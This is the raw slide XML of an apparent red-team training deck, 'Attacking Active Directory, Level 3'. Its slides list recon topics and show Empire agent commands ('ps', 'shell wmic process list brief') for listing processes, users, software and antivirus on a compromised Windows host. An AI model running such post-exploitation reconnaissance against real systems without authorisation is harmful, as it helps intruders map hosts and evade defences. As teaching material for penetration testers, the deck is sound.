            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132094" y="1067461"/>
            <a:ext cx="7856661" cy="5386090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell wmic process list brief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Arch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>itecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Antivirus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF4940D-F428-42EE-ADA6-314408C3F708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="14933"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276746" y="3028949"/>
            <a:ext cx="8915254" cy="3829051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1AD9731-B2D6-403A-A682-B1A05D20C660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249508" y="3254069"/>
            <a:ext cx="2859634" cy="3509195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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6729599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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132094" y="1067461"/>
            <a:ext cx="7856661" cy="5386090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell wmic process list brief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>itecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Antivirus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF4940D-F428-42EE-ADA6-314408C3F708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="14933"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276746" y="3028949"/>
            <a:ext cx="8915254" cy="3829051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F7F05E-0C2F-47EE-9EFD-CF02FCB368FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8194433" y="3254069"/>
            <a:ext cx="879230" cy="3509195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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67906316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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132094" y="1067461"/>
            <a:ext cx="7856661" cy="5386090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell wmic process list brief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Arch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>itecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Antivirus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF4940D-F428-42EE-ADA6-314408C3F708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="14933"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276746" y="3028949"/>
            <a:ext cx="8915254" cy="3829051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF081F1-3466-4DFB-A045-FC8A0D2029D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276746" y="3919610"/>
            <a:ext cx="2859634" cy="2736166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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5073551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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Level 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E36B0F7-43A3-4EA4-BA12-B0F98B2D6652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045691" y="2150163"/>
            <a:ext cx="8354212" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Review of Level 1+2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host/Local Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network/AD Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealthy Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2F70FD-D8F7-4E32-8150-5383EF3175F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368677302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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132094" y="1067461"/>
            <a:ext cx="7856661" cy="5386090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell wmic process list brief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Arch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>itecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Antivirus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF4940D-F428-42EE-ADA6-314408C3F708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="14933"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276746" y="3028949"/>
